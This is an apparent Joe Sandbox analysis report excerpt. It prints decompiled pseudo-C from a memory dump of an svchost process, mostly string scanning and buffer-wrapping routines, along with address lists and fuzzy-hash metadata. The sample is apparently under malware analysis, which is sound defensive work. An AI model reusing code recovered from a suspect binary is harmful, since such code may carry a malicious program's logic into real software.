                                                                                                                                                                                                                                                    						_v60 = 0xffffffff;
                                                                                                                                                                                                                                                    						_v56 = 0;
                                                                                                                                                                                                                                                    						_v56 = 0;
                                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                                    							_t334 = _v56;
                                                                                                                                                                                                                                                    							if(_v56 >=  *((intOrPtr*)( *_v148 + 0x2c))) {
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t370 =  *((intOrPtr*)( *_v148 + 0x28));
                                                                                                                                                                                                                                                    							_t275 = _v56;
                                                                                                                                                                                                                                                    							_t334 =  *((intOrPtr*)( *((intOrPtr*)(_t370 + _t275 * 4))));
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)(_t370 + _t275 * 4)))) != _v52) {
                                                                                                                                                                                                                                                    								_v56 = _v56 + 1;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v60 = _v56;
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(_v60 >= 0) {
                                                                                                                                                                                                                                                    							_t211 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v48, 1);
                                                                                                                                                                                                                                                    							_t377 = _t376 + 0xc;
                                                                                                                                                                                                                                                    							if(_t211 == 0) {
                                                                                                                                                                                                                                                    								_t213 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v28, 1);
                                                                                                                                                                                                                                                    								_t378 = _t377 + 0xc;
                                                                                                                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                                                                                                                    									_t215 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v40, 1);
                                                                                                                                                                                                                                                    									_t379 = _t378 + 0xc;
                                                                                                                                                                                                                                                    									if(_t215 == 0) {
                                                                                                                                                                                                                                                    										_v96 = 0;
                                                                                                                                                                                                                                                    										_t220 = E0401EA00(_t373,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 0x10)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 0x14)),  &_v96);
                                                                                                                                                                                                                                                    										_t376 = _t379 + 0xc;
                                                                                                                                                                                                                                                    										_v92 = _t220;
                                                                                                                                                                                                                                                    										if(_v96 == 0 || _v92 <= 0) {
                                                                                                                                                                                                                                                    											L49:
                                                                                                                                                                                                                                                    											_t334 = 0;
                                                                                                                                                                                                                                                    											if(0 != 0) {
                                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											goto L50;
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											asm("cdq");
                                                                                                                                                                                                                                                    											_v100 = _v92 + _v92 / 0x48 * 2;
                                                                                                                                                                                                                                                    											_t226 = E04020CE0(_v100);
                                                                                                                                                                                                                                                    											_t380 = _t376 + 4;
                                                                                                                                                                                                                                                    											_v132 = _t226;
                                                                                                                                                                                                                                                    											_v104 = _v132;
                                                                                                                                                                                                                                                    											_v56 = 0;
                                                                                                                                                                                                                                                    											_v108 = 0;
                                                                                                                                                                                                                                                    											while(_v56 < _v92) {
                                                                                                                                                                                                                                                    												if(_v56 > 0) {
                                                                                                                                                                                                                                                    													asm("cdq");
                                                                                                                                                                                                                                                    													if(_v56 % 0x48 == 0) {
                                                                                                                                                                                                                                                    														 *((char*)(_v104 + _v108)) = 0xd;
                                                                                                                                                                                                                                                    														 *((char*)(_v104 + _v108 + 1)) = 0xa;
                                                                                                                                                                                                                                                    														_v108 = _v108 + 2;
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												 *((char*)(_v104 + _v108)) =  *((intOrPtr*)(_v96 + _v56));
                                                                                                                                                                                                                                                    												_v56 = _v56 + 1;
                                                                                                                                                                                                                                                    												_v108 = _v108 + 1;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_t228 = E04020CE0(8);
                                                                                                                                                                                                                                                    											_t376 = _t380 + 4;
                                                                                                                                                                                                                                                    											_v136 = _t228;
                                                                                                                                                                                                                                                    											if(_v136 == 0) {
                                                                                                                                                                                                                                                    												_v164 = 0;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												_v164 = E0401F4E0(_v136);
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_v12 = _v164;
                                                                                                                                                                                                                                                    											E0401FC90(_t277, _v12, _t373, _t374, _v104, _v100);
                                                                                                                                                                                                                                                    											if(_v104 != 0) {
                                                                                                                                                                                                                                                    												_v140 = _v104;
                                                                                                                                                                                                                                                    												E04020CC0(_v140);
                                                                                                                                                                                                                                                    												_t376 = _t376 + 4;
                                                                                                                                                                                                                                                    												_v104 = 0x666;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											if(_v96 != 0) {
                                                                                                                                                                                                                                                    												_v144 = _v96;
                                                                                                                                                                                                                                                    												E04020CC0(_v144);
                                                                                                                                                                                                                                                    												_t376 = _t376 + 4;
                                                                                                                                                                                                                                                    												_v96 = 0x666;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											goto L49;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v88 =  *0x426ee4;
                                                                                                                                                                                                                                                    									_v84 =  *0x426ee8;
                                                                                                                                                                                                                                                    									_v80 =  *0x426eec;
                                                                                                                                                                                                                                                    									_v76 =  *0x426ef0;
                                                                                                                                                                                                                                                    									_v74 =  *0x426ef2;
                                                                                                                                                                                                                                                    									_v64 = 0x1a;
                                                                                                                                                                                                                                                    									_v120 = E04020CE0(_v64);
                                                                                                                                                                                                                                                    									_v72 = _v120;
                                                                                                                                                                                                                                                    									E04007010(_t373, _v72, 0, _v64);
                                                                                                                                                                                                                                                    									_t382 = _t379 + 0x10;
                                                                                                                                                                                                                                                    									_v68 =  *((intOrPtr*)(_v148 + 0x10));
                                                                                                                                                                                                                                                    									if(_v68 < 0) {
                                                                                                                                                                                                                                                    										_v68 = 0;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									 *0x4251f8(_v72, _v64 - 1,  &_v88, _v68);
                                                                                                                                                                                                                                                    									_t251 = E04020CE0(8);
                                                                                                                                                                                                                                                    									_t384 = _t382 + 0x14;
                                                                                                                                                                                                                                                    									_v124 = _t251;
                                                                                                                                                                                                                                                    									if(_v124 == 0) {
                                                                                                                                                                                                                                                    										_v160 = 0;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_v160 = E0401F4E0(_v124);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v12 = _v160;
                                                                                                                                                                                                                                                    									_t253 = E040070A0(_v72);
                                                                                                                                                                                                                                                    									_t376 = _t384 + 4;
                                                                                                                                                                                                                                                    									E0401FC90(_t277, _v12, _t373, _t374, _v72, _t253);
                                                                                                                                                                                                                                                    									if(_v72 != 0) {
                                                                                                                                                                                                                                                    										_v128 = _v72;
                                                                                                                                                                                                                                                    										E04020CC0(_v128);
                                                                                                                                                                                                                                                    										_t376 = _t376 + 4;
                                                                                                                                                                                                                                                    										_v72 = 0x666;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									goto L49;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t258 = E04020CE0(8);
                                                                                                                                                                                                                                                    								_t385 = _t378 + 4;
                                                                                                                                                                                                                                                    								_v116 = _t258;
                                                                                                                                                                                                                                                    								if(_v116 == 0) {
                                                                                                                                                                                                                                                    									_v156 = 0;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v156 = E0401F4E0(_v116);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v12 = _v156;
                                                                                                                                                                                                                                                    								_t261 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 8)));
                                                                                                                                                                                                                                                    								_t376 = _t385 + 4;
                                                                                                                                                                                                                                                    								E0401FC90(_t277, _v12, _t373, _t374,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 8)), _t261);
                                                                                                                                                                                                                                                    								goto L49;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t266 = E04020CE0(8);
                                                                                                                                                                                                                                                    							_t386 = _t377 + 4;
                                                                                                                                                                                                                                                    							_v112 = _t266;
                                                                                                                                                                                                                                                    							if(_v112 == 0) {
                                                                                                                                                                                                                                                    								_v152 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v152 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v12 = _v152;
                                                                                                                                                                                                                                                    							_t269 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 4)));
                                                                                                                                                                                                                                                    							_t376 = _t386 + 4;
                                                                                                                                                                                                                                                    							E0401FC90(_t277, _v12, _t373, _t374,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 4)), _t269);
                                                                                                                                                                                                                                                    							goto L49;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L50;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						L50:
                                                                                                                                                                                                                                                    						return E04006C8C(_v12, _t277, _v16 ^ _t375, _t334, _t373, _t374);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L50;
                                                                                                                                                                                                                                                    			}








































































                                                                                                                                                                                                                                                    0x040137a0
                                                                                                                                                                                                                                                    0x040137a0
                                                                                                                                                                                                                                                    0x040137a0
                                                                                                                                                                                                                                                    0x040137b0
                                                                                                                                                                                                                                                    0x040137b3
                                                                                                                                                                                                                                                    0x040137b9
                                                                                                                                                                                                                                                    0x040137c0
                                                                                                                                                                                                                                                    0x040137cc
                                                                                                                                                                                                                                                    0x040137d6
                                                                                                                                                                                                                                                    0x040137e0
                                                                                                                                                                                                                                                    0x040137e8
                                                                                                                                                                                                                                                    0x040137f2
                                                                                                                                                                                                                                                    0x040137fc
                                                                                                                                                                                                                                                    0x04013804
                                                                                                                                                                                                                                                    0x0401380e
                                                                                                                                                                                                                                                    0x04013818
                                                                                                                                                                                                                                                    0x0401381b
                                                                                                                                                                                                                                                    0x0401382f
                                                                                                                                                                                                                                                    0x04013836
                                                                                                                                                                                                                                                    0x04013838
                                                                                                                                                                                                                                                    0x04013838
                                                                                                                                                                                                                                                    0x0401384d
                                                                                                                                                                                                                                                    0x04013854
                                                                                                                                                                                                                                                    0x0401385b
                                                                                                                                                                                                                                                    0x04013862
                                                                                                                                                                                                                                                    0x04013874
                                                                                                                                                                                                                                                    0x0401387c
                                                                                                                                                                                                                                                    0x04013882
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401388c
                                                                                                                                                                                                                                                    0x0401388f
                                                                                                                                                                                                                                                    0x04013895
                                                                                                                                                                                                                                                    0x0401389a
                                                                                                                                                                                                                                                    0x04013871
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013871
                                                                                                                                                                                                                                                    0x0401389f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401389f
                                                                                                                                                                                                                                                    0x040138aa
                                                                                                                                                                                                                                                    0x040138be
                                                                                                                                                                                                                                                    0x040138c3
                                                                                                                                                                                                                                                    0x040138c8
                                                                                                                                                                                                                                                    0x0401394d
                                                                                                                                                                                                                                                    0x04013952
                                                                                                                                                                                                                                                    0x04013957
                                                                                                                                                                                                                                                    0x040139dc
                                                                                                                                                                                                                                                    0x040139e1
                                                                                                                                                                                                                                                    0x040139e6
                                                                                                                                                                                                                                                    0x04013aef
                                                                                                                                                                                                                                                    0x04013b24
                                                                                                                                                                                                                                                    0x04013b29
                                                                                                                                                                                                                                                    0x04013b2c
                                                                                                                                                                                                                                                    0x04013b33
                                                                                                                                                                                                                                                    0x04013c70
                                                                                                                                                                                                                                                    0x04013c70
                                                                                                                                                                                                                                                    0x04013c72
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013b43
                                                                                                                                                                                                                                                    0x04013b46
                                                                                                                                                                                                                                                    0x04013b54
                                                                                                                                                                                                                                                    0x04013b5b
                                                                                                                                                                                                                                                    0x04013b60
                                                                                                                                                                                                                                                    0x04013b63
                                                                                                                                                                                                                                                    0x04013b69
                                                                                                                                                                                                                                                    0x04013b6c
                                                                                                                                                                                                                                                    0x04013b73
                                                                                                                                                                                                                                                    0x04013b7a
                                                                                                                                                                                                                                                    0x04013b86
                                                                                                                                                                                                                                                    0x04013b8b
                                                                                                                                                                                                                                                    0x04013b95
                                                                                                                                                                                                                                                    0x04013b9d
                                                                                                                                                                                                                                                    0x04013ba6
                                                                                                                                                                                                                                                    0x04013bb0
                                                                                                                                                                                                                                                    0x04013bb0
                                                                                                                                                                                                                                                    0x04013b95
                                                                                                                                                                                                                                                    0x04013bc1
                                                                                                                                                                                                                                                    0x04013bc9
                                                                                                                                                                                                                                                    0x04013bd2
                                                                                                                                                                                                                                                    0x04013bd2
                                                                                                                                                                                                                                                    0x04013bd9
                                                                                                                                                                                                                                                    0x04013bde
                                                                                                                                                                                                                                                    0x04013be1
                                                                                                                                                                                                                                                    0x04013bee
                                                                                                                                                                                                                                                    0x04013c03
                                                                                                                                                                                                                                                    0x04013bf0
                                                                                                                                                                                                                                                    0x04013bfb
                                                                                                                                                                                                                                                    0x04013bfb
                                                                                                                                                                                                                                                    0x04013c13
                                                                                                                                                                                                                                                    0x04013c21
                                                                                                                                                                                                                                                    0x04013c2a
                                                                                                                                                                                                                                                    0x04013c2f
                                                                                                                                                                                                                                                    0x04013c3c
                                                                                                                                                                                                                                                    0x04013c41
                                                                                                                                                                                                                                                    0x04013c44
                                                                                                                                                                                                                                                    0x04013c44
                                                                                                                                                                                                                                                    0x04013c4f
                                                                                                                                                                                                                                                    0x04013c54
                                                                                                                                                                                                                                                    0x04013c61
                                                                                                                                                                                                                                                    0x04013c66
                                                                                                                                                                                                                                                    0x04013c69
                                                                                                                                                                                                                                                    0x04013c69
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013c4f
                                                                                                                                                                                                                                                    0x04013b33
                                                                                                                                                                                                                                                    0x040139f1
                                                                                                                                                                                                                                                    0x040139fa
                                                                                                                                                                                                                                                    0x04013a03
                                                                                                                                                                                                                                                    0x04013a0c
                                                                                                                                                                                                                                                    0x04013a16
                                                                                                                                                                                                                                                    0x04013a19
                                                                                                                                                                                                                                                    0x04013a2c
                                                                                                                                                                                                                                                    0x04013a32
                                                                                                                                                                                                                                                    0x04013a3f
                                                                                                                                                                                                                                                    0x04013a44
                                                                                                                                                                                                                                                    0x04013a50
                                                                                                                                                                                                                                                    0x04013a57
                                                                                                                                                                                                                                                    0x04013a59
                                                                                                                                                                                                                                                    0x04013a59
                                                                                                                                                                                                                                                    0x04013a73
                                                                                                                                                                                                                                                    0x04013a7e
                                                                                                                                                                                                                                                    0x04013a83
                                                                                                                                                                                                                                                    0x04013a86
                                                                                                                                                                                                                                                    0x04013a8d
                                                                                                                                                                                                                                                    0x04013a9f
                                                                                                                                                                                                                                                    0x04013a8f
                                                                                                                                                                                                                                                    0x04013a97
                                                                                                                                                                                                                                                    0x04013a97
                                                                                                                                                                                                                                                    0x04013aaf
                                                                                                                                                                                                                                                    0x04013ab6
                                                                                                                                                                                                                                                    0x04013abb
                                                                                                                                                                                                                                                    0x04013ac6
                                                                                                                                                                                                                                                    0x04013acf
                                                                                                                                                                                                                                                    0x04013ad4
                                                                                                                                                                                                                                                    0x04013adb
                                                                                                                                                                                                                                                    0x04013ae0
                                                                                                                                                                                                                                                    0x04013ae3
                                                                                                                                                                                                                                                    0x04013ae3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013aea
                                                                                                                                                                                                                                                    0x0401395b
                                                                                                                                                                                                                                                    0x04013960
                                                                                                                                                                                                                                                    0x04013963
                                                                                                                                                                                                                                                    0x0401396a
                                                                                                                                                                                                                                                    0x0401397c
                                                                                                                                                                                                                                                    0x0401396c
                                                                                                                                                                                                                                                    0x04013974
                                                                                                                                                                                                                                                    0x04013974
                                                                                                                                                                                                                                                    0x0401398c
                                                                                                                                                                                                                                                    0x040139a4
                                                                                                                                                                                                                                                    0x040139a9
                                                                                                                                                                                                                                                    0x040139c5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040139c5
                                                                                                                                                                                                                                                    0x040138cc
                                                                                                                                                                                                                                                    0x040138d1
                                                                                                                                                                                                                                                    0x040138d4
                                                                                                                                                                                                                                                    0x040138db
                                                                                                                                                                                                                                                    0x040138ed
                                                                                                                                                                                                                                                    0x040138dd
                                                                                                                                                                                                                                                    0x040138e5
                                                                                                                                                                                                                                                    0x040138e5
                                                                                                                                                                                                                                                    0x040138fd
                                                                                                                                                                                                                                                    0x04013915
                                                                                                                                                                                                                                                    0x0401391a
                                                                                                                                                                                                                                                    0x04013936
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013936
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401384f
                                                                                                                                                                                                                                                    0x04013c78
                                                                                                                                                                                                                                                    0x04013c88
                                                                                                                                                                                                                                                    0x04013c88
                                                                                                                                                                                                                                                    0x0401384d
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                    • API String ID: 0-2852464175
                                                                                                                                                                                                                                                    • Opcode ID: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                    • Instruction ID: 67b441bc6219ad25058a7dc751711c58666b968fd0b66db19d5699bc980d0709
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FF119B8E00218DFEB14DFA8D990B9DB7B1FF48308F248199D909AB361D771A985CF41
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset
                                                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                                                    • API String ID: 2102423945-4251816714
                                                                                                                                                                                                                                                    • Opcode ID: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                                                                                    • Instruction ID: 265d75645d11992da4b2f1f59cc45b6cd644182446f2ee9bce3e1a8d4e2d5750
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D11209B5A012289FEB64DF54CD88BEEB7B9BB48704F1041D9E609B7280D7746AC4CF58
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                                    			E04013F50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				signed int _v21;
                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				signed char _v73;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                    				intOrPtr _v88;
                                                                                                                                                                                                                                                    				intOrPtr _v92;
                                                                                                                                                                                                                                                    				intOrPtr _v96;
                                                                                                                                                                                                                                                    				intOrPtr _v100;
                                                                                                                                                                                                                                                    				intOrPtr _v104;
                                                                                                                                                                                                                                                    				intOrPtr _v108;
                                                                                                                                                                                                                                                    				intOrPtr _v112;
                                                                                                                                                                                                                                                    				intOrPtr _v116;
                                                                                                                                                                                                                                                    				intOrPtr _v120;
                                                                                                                                                                                                                                                    				intOrPtr _v124;
                                                                                                                                                                                                                                                    				intOrPtr _v128;
                                                                                                                                                                                                                                                    				char _v132;
                                                                                                                                                                                                                                                    				char _v136;
                                                                                                                                                                                                                                                    				void* _t223;
                                                                                                                                                                                                                                                    				void* _t224;
                                                                                                                                                                                                                                                    				void* _t231;
                                                                                                                                                                                                                                                    				intOrPtr _t237;
                                                                                                                                                                                                                                                    				void* _t260;
                                                                                                                                                                                                                                                    				intOrPtr _t267;
                                                                                                                                                                                                                                                    				signed int _t283;
                                                                                                                                                                                                                                                    				intOrPtr _t286;
                                                                                                                                                                                                                                                    				void* _t292;
                                                                                                                                                                                                                                                    				void* _t394;
                                                                                                                                                                                                                                                    				void* _t395;
                                                                                                                                                                                                                                                    				void* _t396;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t395 = __esi;
                                                                                                                                                                                                                                                    				_t394 = __edi;
                                                                                                                                                                                                                                                    				_t292 = __ebx;
                                                                                                                                                                                                                                                    				_v120 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				while(_a4 != 0 && _a8 >= 0 && _a12 >= 0xffffffff) {
                                                                                                                                                                                                                                                    					if(_a8 <=  *((intOrPtr*)(_a4 + 4)) - 1) {
                                                                                                                                                                                                                                                    						if(_a12 <=  *((intOrPtr*)(_a4 + 4)) - _a8) {
                                                                                                                                                                                                                                                    							if(_a12 < 0) {
                                                                                                                                                                                                                                                    								_a12 =  *((intOrPtr*)(_a4 + 4)) - _a8;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v12 =  *_a4;
                                                                                                                                                                                                                                                    							_v16 = _a8 + _a12;
                                                                                                                                                                                                                                                    							_v20 = _a8;
                                                                                                                                                                                                                                                    							while(_v20 < _v16) {
                                                                                                                                                                                                                                                    								_v21 = 0;
                                                                                                                                                                                                                                                    								_t223 = E040072C4(_v12 + _v20, 0x426c54, 2);
                                                                                                                                                                                                                                                    								_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                    								if(_t223 != 0) {
                                                                                                                                                                                                                                                    									_t224 = E040072C4(_v12 + _v20, 0x426c50, 2);
                                                                                                                                                                                                                                                    									_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                    									if(_t224 != 0) {
                                                                                                                                                                                                                                                    										L74:
                                                                                                                                                                                                                                                    										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										if((_a20 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    											_v32 = 0;
                                                                                                                                                                                                                                                    											while(_v32 < 4) {
                                                                                                                                                                                                                                                    												_t286 = E040070A0( *((intOrPtr*)(0x429f40 + _v32 * 4)));
                                                                                                                                                                                                                                                    												_t396 = _t396 + 4;
                                                                                                                                                                                                                                                    												_v36 = _t286;
                                                                                                                                                                                                                                                    												_push(_v36);
                                                                                                                                                                                                                                                    												_push( *((intOrPtr*)(0x429f40 + _v32 * 4)));
                                                                                                                                                                                                                                                    												_t50 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                    												_push(_v12 + _t50);
                                                                                                                                                                                                                                                    												if( *0x4251fc() != 0) {
                                                                                                                                                                                                                                                    													_v32 = _v32 + 1;
                                                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                    													_v21 = 1;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    												goto L24;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										L24:
                                                                                                                                                                                                                                                    										if((_a16 & 0x000000ff) == 1 && (_v21 & 0x000000ff) == 0 && _v20 + 6 < _v16) {
                                                                                                                                                                                                                                                    											_t59 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                    											_t283 =  *0x4251fc(_v12 + _t59, 0x426cc8, 6);
                                                                                                                                                                                                                                                    											asm("sbb eax, eax");
                                                                                                                                                                                                                                                    											_v21 =  ~_t283 + 1;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_v28 = 0;
                                                                                                                                                                                                                                                    										if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    											_v28 = E04013F50(_t292, _v120, _t394, _t395, _a4, _v20 + 2, 0xffffffff, _a16 & 0x000000ff, _a20 & 0x000000ff);
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										if(_v28 == 0) {
                                                                                                                                                                                                                                                    											_v40 = _v20 + 2;
                                                                                                                                                                                                                                                    											while(_v40 < _v16) {
                                                                                                                                                                                                                                                    												_t231 = E040072C4(_v12 + _v40, 0x426c54, 2);
                                                                                                                                                                                                                                                    												_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                    												if(_t231 != 0) {
                                                                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                                                                    													if(_v8 == 0) {
                                                                                                                                                                                                                                                    														_v40 = _v40 + 1;
                                                                                                                                                                                                                                                    														continue;
                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                    													if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    														_t86 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                    														_v52 = _v12 + _t86;
                                                                                                                                                                                                                                                    														_v44 = _v40 - _v20 + 2;
                                                                                                                                                                                                                                                    														_v48 = E04011440(_v120, _v52, _v44);
                                                                                                                                                                                                                                                    														if(_v48 <= 0xffffffff) {
                                                                                                                                                                                                                                                    															_t237 = E04020CE0(0x38);
                                                                                                                                                                                                                                                    															_t396 = _t396 + 4;
                                                                                                                                                                                                                                                    															_v108 = _t237;
                                                                                                                                                                                                                                                    															if(_v108 == 0) {
                                                                                                                                                                                                                                                    																_v132 = 0;
                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                    																_v132 = E04010CD0(_v108);
                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                    															_v84 = _v132;
                                                                                                                                                                                                                                                    															_t197 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                    															if((E040111A0(_t292, _v84, _t394, _t395, _v12 + _t197, _v40 - _v20 + 2, _v20, _v40 + 2 - _v20) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    																if(_v84 != 0) {
                                                                                                                                                                                                                                                    																	_v116 = _v84;
                                                                                                                                                                                                                                                    																	_v112 = _v116;
                                                                                                                                                                                                                                                    																	if(_v112 == 0) {
                                                                                                                                                                                                                                                    																		_v136 = 0;
                                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                                    																		_v136 = E04006780(_v112, 1);
                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                    																	_v84 = 0x666;
                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                    																goto L69;
